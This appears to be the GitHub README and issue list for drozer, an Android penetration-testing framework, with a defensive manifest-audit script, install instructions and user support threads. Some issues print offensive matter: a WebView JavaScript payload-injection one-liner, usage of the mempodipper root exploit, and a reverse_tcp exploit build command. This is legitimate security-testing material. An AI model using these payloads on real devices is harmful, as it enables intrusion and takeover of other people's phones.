The Leading Security Assessment Framework for Android.

Overview

drozer

----------------------------------------------------------------

NOTE

We would like to formally announce that F-Secure has stopped further development of the drozer tool. With the amount of testing tools and techniques that have been developed since drozer's inception, it would be near impossible to incorporate everything into one tool.

However, we still think drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience required to show the impact of letting certain components be exported on a device.

To help ensure drozer can be run on modern systems, a Docker container was created that has a working build of drozer.

----------------------------------------------------------------

drozer (formerly Mercury) is the leading security testing framework for Android.

drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.
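
The exposure drozer is used to demonstrate, exported components reachable by any other app, can also be checked from the defender's side by reading the app's decoded manifest. The Python 3 script below is an added example, not part of drozer or of this README; the sample manifest, package name and permission names are constructed, and it assumes textual `protectionLevel` values and a `<uses-sdk>` element in the manifest.

```python
"""List exported components that an unprivileged third-party app could reach."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample input: a decoded AndroidManifest.xml for a fictional app.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
  <uses-sdk android:minSdkVersion="21" android:targetSdkVersion="30"/>
  <permission android:name="com.example.notes.READ" android:protectionLevel="normal"/>
  <permission android:name="com.example.notes.INTERNAL" android:protectionLevel="signature"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
    </activity>
    <activity android:name=".SettingsActivity"/>
    <service android:name=".SyncService" android:exported="true"
             android:permission="com.example.notes.INTERNAL"/>
    <receiver android:name=".BootReceiver" android:exported="true"/>
    <provider android:name=".NotesProvider" android:authorities="com.example.notes"
              android:exported="true" android:readPermission="com.example.notes.READ"/>
  </application>
</manifest>
"""


def attr(elem, name, default=None):
    """Read an android:-namespaced attribute."""
    return elem.get(ANDROID_NS + name, default)


def is_exported(elem, target_sdk):
    """Apply the manifest's explicit value, else Android's default-export rule."""
    explicit = attr(elem, "exported")
    if explicit is not None:
        return explicit.strip().lower() == "true"
    if elem.tag == "provider":
        return target_sdk < 17  # providers defaulted to exported before API 17
    # Without an explicit value, declaring an intent filter implies exported.
    return elem.find("intent-filter") is not None


def guard_weakness(permission, declared_levels):
    """Explain why a guard does not keep other apps out, or return None if it does."""
    if not permission:
        return "no permission"
    level = declared_levels.get(permission)
    if level is None:
        return None  # declared elsewhere (platform or another app): not judged here
    if not any(part.startswith("signature") for part in level.split("|")):
        return "permission %s has protectionLevel %s" % (permission, level)
    return None


def audit_manifest(manifest_xml):
    """Return [(tag, name, {access: weakness})] for reachable exported components."""
    root = ET.fromstring(manifest_xml)
    uses_sdk = root.find("uses-sdk")
    target_sdk = int(attr(uses_sdk, "targetSdkVersion", "1")) if uses_sdk is not None else 1
    # Permissions declared by this app; protectionLevel defaults to "normal".
    declared = {attr(p, "name"): attr(p, "protectionLevel", "normal")
                for p in root.findall("permission")}
    app = root.find("application")
    findings = []
    for elem in (app if app is not None else []):
        if elem.tag not in COMPONENT_TAGS or not is_exported(elem, target_sdk):
            continue
        # A component-level permission overrides the application-level one.
        base = attr(elem, "permission") or attr(app, "permission")
        if elem.tag == "provider":
            guards = {"read": attr(elem, "readPermission") or base,
                      "write": attr(elem, "writePermission") or base}
        else:
            guards = {"invoke": base}
        gaps = {}
        for access, permission in guards.items():
            weakness = guard_weakness(permission, declared)
            if weakness:
                gaps[access] = weakness
        if gaps:
            findings.append((elem.tag, attr(elem, "name"), gaps))
    return findings


if __name__ == "__main__":
    for tag, name, gaps in audit_manifest(SAMPLE_MANIFEST):
        print("%-9s %-16s %s" % (tag, name, gaps))
```

Launcher activities are exported by design, so entries such as `.MainActivity` are review items rather than defects; the provider and receiver findings are the ones to close with `android:exported="false"` or a signature-level permission.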

drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (MWR's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

drozer is open source software, maintained by MWR InfoSecurity, and can be downloaded from: https://labs.f-secure.com/tools/drozer/

Prerequisites

  1. Python 2.7

     Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

  2. Protobuf 2.6 or greater

  3. pyOpenSSL 16.2 or greater

  4. Twisted 10.2 or greater

  5. Java Development Kit 1.7

     Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

  6. Android Debug Bridge

Installing

Building Python wheel

git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python setup.py bdist_wheel

Installing Python wheel

sudo pip install dist/drozer-2.x.x-py2-none-any.whl

Building for Debian/Ubuntu/Mint

git clone https://github.com/FSecureLABS/drozer.git
cd drozer
make deb

Installing .deb (Debian/Ubuntu/Mint)

sudo dpkg -i drozer-2.x.x.deb

Building for Redhat/Fedora/CentOS

git clone https://github.com/FSecureLABS/drozer.git
cd drozer
make rpm

Installing .rpm (Redhat/Fedora/CentOS)

sudo rpm -i drozer-2.x.x-1.noarch.rpm

Building for Windows

NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python.exe setup.py bdist_msi

Installing .msi (Windows)

Run dist/drozer-2.x.x.win-x.msi 

Installing (Arch Linux/BlackArch)

On BlackArch, or any Arch-based Linux distribution where the BlackArch repository is enabled:

pacman -S drozer

PKGBUILD

Installing (Arch Linux/AUR)

With any pacman wrapper:

pikaur -S drozer

PKGBUILD (WARNING: out-of-date)

Usage

Installing the Agent

Drozer can be installed using Android Debug Bridge (adb).

Download the latest Drozer Agent here.

$ adb install drozer-agent-2.x.x.apk

Starting a Session

You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you’re ready to start exploring.

We will use the server embedded in the drozer Agent to do this.

If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

$ adb forward tcp:31415 tcp:31415

Now, launch the Agent, select the “Embedded Server” option and tap “Enable” to start the server. You should see a notification that the server has started.

Then, on your PC, connect using the drozer Console:

On Linux:

$ drozer console connect

On Windows:

> drozer.bat console connect

If using a real device, the IP address of the device on the network must be specified:

On Linux:

$ drozer console connect --server 192.168.0.10

On Windows:

> drozer.bat console connect --server 192.168.0.10

You should be presented with a drozer command prompt:

selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
dz>

The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

You are now ready to start exploring the device.

Command Reference

Command       Description
run           Executes a drozer module
list          Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
shell         Start an interactive Linux shell on the device, in the context of the Agent process.
cd            Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.
clean         Remove temporary files stored by drozer on the Android device.
contributors  Displays a list of people who have contributed to the drozer framework and modules in use on your system.
echo          Print text to the console.
exit          Terminate the drozer session.
help          Display help about a particular command or module.
load          Load a file containing drozer commands, and execute them in sequence.
module        Find and install additional drozer modules from the Internet.
permissions   Display a list of the permissions granted to the drozer Agent.
set           Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
unset         Remove a named variable that drozer passes to any Linux shells that it spawns.

License

drozer is released under a 3-clause BSD License. See LICENSE for full details.

Contacting the Project

drozer is Open Source software, made great by contributions from the community.

For full source code, to report bugs, suggest features and contribute patches please see our Github project:

https://github.com/FSecureLABS/drozer

Bug reports, feature requests, comments and questions can be submitted here.

Comments
  • Drozer Shell Injection, Octal Escaping and /system/bin/ash

    In the "WebView addJavascriptInterface Remote Code Execution" article, there is a great introduction to drozer payload injecting using the addJavaScriptInterface flaw. However, I think the payload delivery method is broken on Android devices running /system/bin/ash.

    The article recommends this line for creating a payload to inject through malicious JavaScript:

    $ drozer payload build weasel.shell.armeabi | grep echo | awk -F \" {'gsub("\\\\","\\\\");
    print "execute([\x27/system/bin/sh\x27,\x27-c\x27,\x27 echo -e \\\""$2"\\\" > \x27+path]);"'}
    

    Which will give you a one liner:

    execute(['/system/bin/sh','-c','echo -e "…………………" > '+path]);
    

    However, it does not appear that the /system/bin/sh (which is ash) appropriately accommodates octal escaping in this manner:

    # /system/bin/sh -c echo -e "\0177\0105\0114\0106\0001\0001" >f
    # ls -l f
    -rw-rw-rw- root     root            1 2013-10-12 23:06 f
    

    It looks like ash does not preserve the input data, leaving us with a 1 byte file (expected 6 bytes). Not to be discriminatory, ash doesn't preserve the input data for hex escaping either:

    # /system/bin/sh -c echo -e "\x41\x41\x41\x41" >f
    # ls -l f
    -rw-rw-rw- root     root            1 2013-10-12 23:12 f
    

    I'm testing this on an Android API15 emulator. Any thoughts on getting escaped binary content delivered to Android devices for Weasel deployment reliably?

    Thanks,

    -Josh

    opened by joswr1ght 27
  • [Errno 22] Invalid argument

    Hi

    As soon as I try to connect to the virtual device (drozer console connect), I have this error:

    drozer Console (v2.3.4) [Errno 22] Invalid argument

    On the virtual device, I see in the app log:

    Accepted connection Starting drozer thread W Connection was reset

    Any idea about what could be the issue?

    Thanks

    Support 
    opened by javixeneize 24
  • Communication protocol redesign

    We are looking at redesigning the communications protocol to take this project to the next level.

    The communication protocol is rather simple at the moment and is using a defined XML communication in 1 direction only, from client to server. In order to reach a point where Mercury can be used for many purposes, the following would need to be supported by the communications protocol:

    • Encryption - I suspect something like SSL would be best
    • Bi-directional communications. The ability to have the server connect back to the client OR the client connect to the server (i.e. reverse and bind connections) would be needed in many applications of Mercury.

    By implementing these, it would be the most flexible. Examples of when a bind connection is needed: current "assessment suite". Examples of when a reverse connection is needed: full exploitation suite

    Any ideas are welcome. Tyrone

    Design 
    opened by metall0id 22
  • Mercury hangs on connect

    When typing connect the console hangs on some devices. It has been noted to do this on the Galaxy Nexus. It could be all Ice Cream Sandwich devices as well.

    It is believed that this happens when loading libjackpal-androidterm3.so

    opened by metall0id 17
  • [Errno 22] Invalid argument

    I was using drozer successfully, but suddenly this error is showing while connecting: "[Errno 22] Invalid argument". Could you help me figure out what I am doing wrong?

    Same happened on other device too.

    Thanks for making a wonderful product.

    Support 
    opened by johnconner31 16
  • Include localroot for 4.0.3 <

    Current public releases of mempodipper, the most recent local root for Android devices based on the /proc/pid/mem arbitrary write, only support a few handsets, as the exploit requires you to pass it offsets for setuid() and for exit(), and these have only been determined for a number of devices. nesquick95 @ xda developers devised a method for obtaining these offsets, and I have merged his code into the mempodipper exploit. Cross compile for arm, and then run on a vulnerable device:

    ./mempodipper < address to exit> < address to setuid> <-command>

    or now alternatively:

    ./mempodipper - - <-command>

    The dynamic version of mempodipper is relatively untested, and likely needs some work before it is ready to be incorporated into mercury, however most of the work is already done.

    source here: http://pastebin.com/RM4zyy9a

    Module 
    opened by tel0seh 15
  • Unable to install drozer in Kali Linux

    I have tried to install drozer with "Building for Debian/Ubuntu/Mint" and "Installing .deb (Debian/Ubuntu/Mint)", but both ways didn't work for me. I am facing these issues while installing drozer:

    Error 1:

    cd common; protoc --python_out=../src/pydiesel/api/ protobuf.proto
    /bin/sh: 1: protoc: not found
    make: *** [Makefile:55: src/pydiesel/api/protobuf_pb2.py] Error 127

    Error 2:

    dpkg: dependency problems prevent configuration of drozer:
    drozer depends on python-protobuf (>= 2.4.1); however:
    Package python-protobuf is not installed.

    dpkg: error processing package drozer (--install):
    dependency problems - leaving unconfigured
    Errors were encountered while processing:
    drozer

    I have also installed protobuf using the pip command, but I am still getting this same issue.

    opened by parteeksingh005 14
  • Error when building sample exploit

    Hi,

    I was following the user guide and trying to get the exploit shown in the guide working, but it throws an error "could not repack the agent sources". See below

    $ drozer exploit build exploit.remote.browser.nanparse --payload weasel.reverse_tcp.armeabi --credentials weasel pass1234 --server 0.0.0.0:31415 --resource /home.html
    Uploading weasel to /weasel and W...  [  OK  ]
    Packaging an Agent... (this may take some time)
    could not repack the agent sources
    
    Uploading the Agent to /agent.apk and A...
    $
    

    Also the user guide is kinda outdated, it has incorrect syntax and exploit name, in addition to typo.

    However, all these don't mask the fact that drozer is a very promising tool, if the exploit list is actively maintained.

    Thanks!

    Bug Report 
    opened by mrpinghe 12
  • MWR Code licence

    Hi, we are a little bit worried about the license of Mercury. Since it is not a well-known license, we are not sure if we will be allowed to keep working on it in the future. I'm sure the people that work on Mercury would be more comfortable if it is licensed under a well-known license such as Apache or GPL. And maybe more people would be interested to contribute to the project.

    Question 
    opened by luander 11
  • Failed install of Drozer 2.4.4

    Steps to reproduce

    1. I am trying to install Drozer 2.4.4 when I try to run the command "python setup.py bdist_wheel"
    2. I have installed and verified the prereqs. I have cloned the repository

    I receive the following error:

    Traceback (most recent call last):
      File "setup.py", line 4, in
        import setuptools
    ImportError: No module named setuptools
    cparker@cparker-Latitude-E7470:~/drozer$

    Environment

    Ubuntu 20.10

    cparker@cparker-Latitude-E7470:~$ java --version
    openjdk 11.0.9.1 2020-11-04
    OpenJDK Runtime Environment (build 11.0.9.1+1-Ubuntu-0ubuntu1.20.10)
    OpenJDK 64-Bit Server VM (build 11.0.9.1+1-Ubuntu-0ubuntu1.20.10, mixed mode, sharing)

    I have Googled the error and tried to correct it.

    cparker@cparker-Latitude-E7470:~$ sudo apt-get install python-setuptools
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    python-setuptools is already the newest version (44.1.1-1).
    0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

    opened by parkclay 10
  • Error during install Drozer

    Steps to reproduce

    git clone https://github.com/mwrlabs/drozer/
    cd drozer
    python setup.py bdist_wheel
    

    Expected behaviour

    should Building Python wheel

    Actual behaviour:

    root@kali:~/drozer# python setup.py bdist_wheel
    Traceback (most recent call last):
      File "setup.py", line 132, in
        version = get_version(),
      File "setup.py", line 128, in get_version
        return subprocess.check_output(version_cmd).split('-', 1)[0]
      File "/usr/lib/python2.7/subprocess.py", line 216, in check_output
        process = Popen(stdout=PIPE, *popenargs, **kwargs)
      File "/usr/lib/python2.7/subprocess.py", line 394, in init
        errread, errwrite)
      File "/usr/lib/python2.7/subprocess.py", line 1047, in _execute_child
        raise child_exception
    OSError: [Errno 2] No such file or directory

    Environment

    Operating system: Linux Kali

    Java Version: 1.7

    Drozer Version: latest clone

    please help

    opened by alonf1983 10
  • When trying to set up drozer it shows SyntaxError: invalid syntax

    Steps to reproduce

    Hi, I have faced some issues during the installation of drozer. When I try to set up drozer using python.exe setup.py bdist_msi it shows me this kind of error:

    Traceback (most recent call last):
      File "C:\Users\User\Downloads\drozer-develop\setup.py", line 8, in <module>
        from src.drozer import meta
      File "C:\Users\User\Downloads\drozer-develop\src\drozer\meta.py", line 63
        print "%s %s\n" % (name, version)
              ^
    SyntaxError: invalid syntax
    
    

    And that's why I cannot install it. Please, can anyone help me get rid of it?

    opened by joyahamad074 0
  • syntax error, please solve it; many people have the same problem

    drozer console connect
    Traceback (most recent call last):
      File "C:\Python27\Scripts\drozer", line 30, in
        import("drozer.cli.%s" % (sys.argv[1]))
      File "C:\Python27\lib\site-packages\drozer\cli\console.py", line 8, in
        from drozer.console import Console
      File "C:\Python27\lib\site-packages\drozer\console_init_.py", line 4, in
        from drozer.console.console import Console
      File "C:\Python27\lib\site-packages\drozer\console\console.py", line 5, in
        from pydiesel.api.protobuf_pb2 import Message
      File "C:\Python27\lib\site-packages\pydiesel\api_init_.py", line 9, in
        from pydiesel.api.frame import Frame
      File "C:\Python27\lib\site-packages\pydiesel\api\frame.py", line 3, in
        from pydiesel.api.protobuf_pb2 import Message
      File "C:\Python27\lib\site-packages\pydiesel\api\protobuf_pb2.py", line 3, in
        from google.protobuf import descriptor
    ImportError: No module named google.protobuf

    opened by kaal-kali 1
  • my own module can't proceed from beginning

    Here is my module code:

    ################################################################################
    from drozer.modules import Module


    class GetInteger(Module):
        # Module metadata shown by drozer's list/help commands.
        name = "Get Device info"
        description = "A module that returns information about the device and hardware features"
        examples = "run ex.device.getinteger"
        date = "10-11-13"
        author = "Keith Makan"
        license = "BSD (3-clause)"
        path = ["ex", "device"]

        # execute() must be indented inside the class body for drozer to find it.
        def execute(self, arguments):
            # Instantiate android.os.Build through the agent and print its fields.
            build = self.new("android.os.Build")
            self.stdout.write("Getting device info . . . \n")
            self.stdout.write("[ * ] BOARD : %s\n" % (build.BOARD))
            self.stdout.write("[ * ] BOOTLOADER : %s\n" % (build.BOOTLOADER))
            self.stdout.write("[ * ] BRAND : %s\n" % (build.BRAND))
            self.stdout.write("[ * ] CPU_ABI : %s\n" % (build.CPU_ABI))
            self.stdout.write("[ * ] CPU_ABI2 : %s\n" % (build.CPU_ABI2))
            self.stdout.write("[ * ] DEVICE : %s\n" % (build.DEVICE))
            self.stdout.write("[ * ] DISPLAY : %s\n" % (build.DISPLAY))
            self.stdout.write("[ * ] FINGERPRINT : %s\n" % (build.FINGERPRINT))
            self.stdout.write("[ * ] HARDWARE : %s\n" % (build.HARDWARE))
            self.stdout.write("[ * ] MANUFACTURER : %s\n" % (build.MANUFACTURER))
            self.stdout.write("[ * ] MODEL : %s\n" % (build.MODEL))
            self.stdout.write("[ * ] TAGS : %s\n" % (build.TAGS))
    ###########################################################################

    But when I run it, "does not define an execute() method" is shown, but I really do define execute. So where is it wrong?

    opened by boapgt 0
  • Drozer console connect - SyntaxError. Help Please.

    I tried reinstalling python2.7, reinstalling drozer, setting environment variables, updating modules, installing from another pc. But I get the same message as below. please Help.

    Steps to reproduce

    1. git clone https://github.com/FSecureLABS/drozer.git
    2. cd drozer
    3. python.exe setup.py bdist_msi
    4. install drozer pip2 install pyyaml pip2 install protobuf pip2 install pyopenssl pip2 install twisted pip2 install service_identity
    5. install agent.apk in Nox player
    6. adb forward tcp:31415 tcp:31415
    7. drozer console connect success

    Expected behaviour

    drozer console connect success

    Actual behaviour

    C:\Users\user>drozer.bat console connect
    
    Traceback (most recent call last):
      File "C:\Python27\Scripts\drozer", line 30, in <module>
        __import__("drozer.cli.%s" % (sys.argv[1]))
      File "C:\Python27\Lib\site-packages\drozer\cli\console.py", line 8, in <module>
        from drozer.console import Console
      File "C:\Python27\Lib\site-packages\drozer\console\__init__.py", line 4, in <module>
        from drozer.console.console import Console
      File "C:\Python27\Lib\site-packages\drozer\console\console.py", line 5, in <module>
        from pydiesel.api.protobuf_pb2 import Message
      File "C:\Python27\Lib\site-packages\pydiesel\api\__init__.py", line 9, in <module>
        from pydiesel.api.frame import Frame
      File "C:\Python27\Lib\site-packages\pydiesel\api\frame.py", line 3, in <module>
        from pydiesel.api.protobuf_pb2 import Message
      File "C:\Python27\Lib\site-packages\pydiesel\api\protobuf_pb2.py", line 3, in <module>
        from google.protobuf import descriptor
      File "C:\Python27\lib\site-packages\google\protobuf\descriptor.py", line 113
        class DescriptorBase(metaclass=DescriptorMetaclass):
                                      ^
    SyntaxError: invalid syntax
    
    

    Environment

    Operating system: Windows 10

    USER environment variables

    PATH =

    C:\Python27
    C:\Python27\Scripts
    

    PYTHONPATH =

    C:\Python27\Lib\site-packages
    C:\Users\user\drozer\src
    C:\Users\user\drozer\test
    

    SYSTEM environment variables

    PATH =

    %JAVA_HOME%\bin
    C:\Program Files\Common Files\Oracle\Java\javapath
    

    JAVA_HOME= C:\Program Files\JAVA\jdk-17

    Java Version: Openjdk 17 Python 2.7

    opened by pt615 2
  • ImportError: DLL load failed: %1 is not a valid Win32 application.

    It's been a while since I've used Drozer via Windows 10.

    I updated to the 2.4.4 version, started the app, forwarded the correct port, but continue to get this error message

    I tried uninstalling dependencies and re-installing them, but with the EOL of Python2.7, it's been growing more and more frustrating. Any help on this would be very appreciated.

    opened by 0x676f64 1
  • [Errno 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond

    Hi, I'm new here and I'm trying to connect my Samsung Galaxy A51 to my Windows 7 x64 in order to run some script that relies on Drozer.

    Steps to reproduce

    1. I've successfully installed Python 2.7.18, Java SE Developer Kit 1.7.0_80, Android Debug Bridge 1.0.41 (31.0.2-7242960) and Drozer 2.4.4 on my Windows 7 x64 computer.
    2. I've successfully added Python 2.7.18, Java SE Developer Kit 1.7.0_80, Android Debug Bridge 1.0.41 (31.0.2-7242960) and Drozer 2.4.4 to System > Advanced Properties > Environment Variables > System Variables > Path.
    3. I've successfully installed packages attrs 21.2.0, Automat 20.2.0, cffi 1.14.5, constantly 15.1.0, cryptography 3.3.2, drozer 2.4.3, enum34 1.1.10, hyperlink 21.0.0, idna 2.10, incremental 21.3.0, ipaddress 1.0.23, pip 20.3.4, protobuf 3.17.2, pyasn1 0.4.8, pyasn1-modules 0.2.8, pycparser 2.20, PyHamcrest 1.10.1, pyOpenSSL 20.0.1, PyYAML 5.4.1, service-identity 21.1.0, setuptools 44.1.1, six 1.16.0, Twisted 20.3.0, typing 3.10.0.0, wheel 0.36.2 and zope.interface 5.4.0 to Python 2.7.18.
    4. I've successfully connected my mobile to my PC via factory-provided USB cable and programmed it so that "USB controlled by" is set to "This phone" (I actually tried setting it to "Connected device" first, but it failed and I was forced to settle for "This phone"), "Use USB for" is set to "Transferring files" and "USB debugging" is toggled on (permission for my PC to debug my phone granted, as confirmed by command adb devices returning List of devices attached > RQ8N300XYDH device).
    5. I've successfully installed Drozer Agent 2.3.4 to my Samsung Galaxy A51 mobile phone (OS Android 10).
    6. I've successfully run command adb forward tcp:31415 tcp:31415 as instructed, returning 31415.
    7. I've attempted to run drozer console connect --server 192.168.0.17 (where 192.168.0.17 is my phone's IP address according to Settings > About Phone > Status > IP address), but after roughly 30s, I get a return message
    C:\Program Files\Python27\lib\site-packages\OpenSSL\crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
      from cryptography import utils, x509
    There was a problem connecting to the drozer Server.
    
    Things to check:
    
     - is the drozer Server running?
     - have you set up appropriate adb port forwards?
     - have you specified the correct hostname and port with --server?
     - is the server protected with SSL (add an --ssl switch)?
     - is the agent protected with a password (add a --password switch)?
    
    Debug Information:
    [Errno 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond
    
    

    Observations:

    1. The Python error message appears immediately, but variations thereof occur every time I run anything on Python 2.7.18; as long as it says support […] will be removed in the next release rather than this version of Python is not supported, I don't believe that's the root of my problem. In any case, that's it for about 30s, then the rest of the error message (starting with "There was a problem connecting to the drozer Server.") appears. I believe it's trying to connect and failing; I have no idea why.
    2. If by "drozer Server" you mean the computer programme, "Python drozer-2.4.4" (installed via a file drozer-2.4.4.win32.msi I downloaded from https://labs.f-secure.com/tools/drozer/), then yes, it is running. If by "drozer Server" you mean the drozer 2.4.3 package in Python (installed by running python -m pip install drozer on an elevated Command Prompt), then yes, it's running, though it is not the same version number as the Drozer computer programme aforementioned. If by "drozer Server" you mean the "drozer Agent 2.3.4" app on my mobile (installed by downloading a package drozer-agent-2.3.4.apk from https://github.com/FSecureLABS/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk into the platform-tools folder and executing adb install drozer-agent-2.3.4.apk on an elevated Command Prompt), then yes, it's running, though the version number is not the same as either of the above. I've attempted "closing" the app and clearing my RAM memory, then launching it again, turning the "Embedded Server" option off and on again, and running drozer console connect --server 192.168.0.17 anew, but the only change is it only took 25s to return the error message this time (also, the app now records an error message of its own, "IO Error. Resetting connection." > "Stopped." > "Starting Server…" > "Attempting to bind to port 31415…" > "Waiting for connections…"; the latter three messages are the same ones it had been showing before, though, which are still recorded above the error message).
    3. I believe "set[ting] up appropriate adb port forwards" would be that adb forward tcp:31415 tcp:31415 command, right? Did I not execute it correctly?
    4. The "correct hostname and port" would be my mobile's IP address, right? Which is a function of the network, BTW. I've attempted switching networks, which changed the phone's IP address, but the result (replacing the old IP in the command line with the new one) is still the same.
    5. According to the app, SSL is disabled.
    6. In the app settings, there's an option "Password", but the field is empty, and the instructions and tutorials didn't say anything about it being mandatory, so I left it blank (as it was when the app was first installed).
    7. Google has nothing on Errno 10060 regarding Drozer.

    Expected behaviour

    According to the instructions and tutorials, I should be presented with a Drozer command prompt that looks like selecting f75640f67144d9a3 (unknown sdk 4.1.1). I would then be able to run commands on the Drozer console, and the programme would be able to perform DAST (or SAST) on my mobile.

    Actual behaviour

    I get an error message [Errno 10060] because the Drozer on my PC failed to connect to the Drozer Agent on my phone, and therefore cannot start up the Drozer console.

    Environment

    Operating system: Windows 7 x64

    Java Version: Java SE Developer Kit 1.7.0_80

    Android Version: 10

    Drozer Version: 2.4.4 (Windows); 2.4.3 (Python); 2.3.4 (Android)

    Install Method: Installed from .msi package (Windows); python -m pip install drozer (Python); adb install drozer-agent-2.3.4.apk (Android)

    Drozer Config

    No idea. How do I access this file?

    Drozer Error Logs

    C:\Program Files\Python27\lib\site-packages\OpenSSL\crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
      from cryptography import utils, x509
    There was a problem connecting to the drozer Server.
    
    Things to check:
    
     - is the drozer Server running?
     - have you set up appropriate adb port forwards?
     - have you specified the correct hostname and port with --server?
     - is the server protected with SSL (add an --ssl switch)?
     - is the agent protected with a password (add a --password switch)?
    
    Debug Information:
    timed out
    

    ADB Logs

    Running

    adb logcat -c
    adb logcat > drozer_error.log
    

    causes the Command Prompt to stop responding.

    opened by rgiotxy 0
Releases(2.4.4)
Owner
WithSecure Labs
Welcome to WithSecure Labs. Here we publish research, and share our tools with the security community.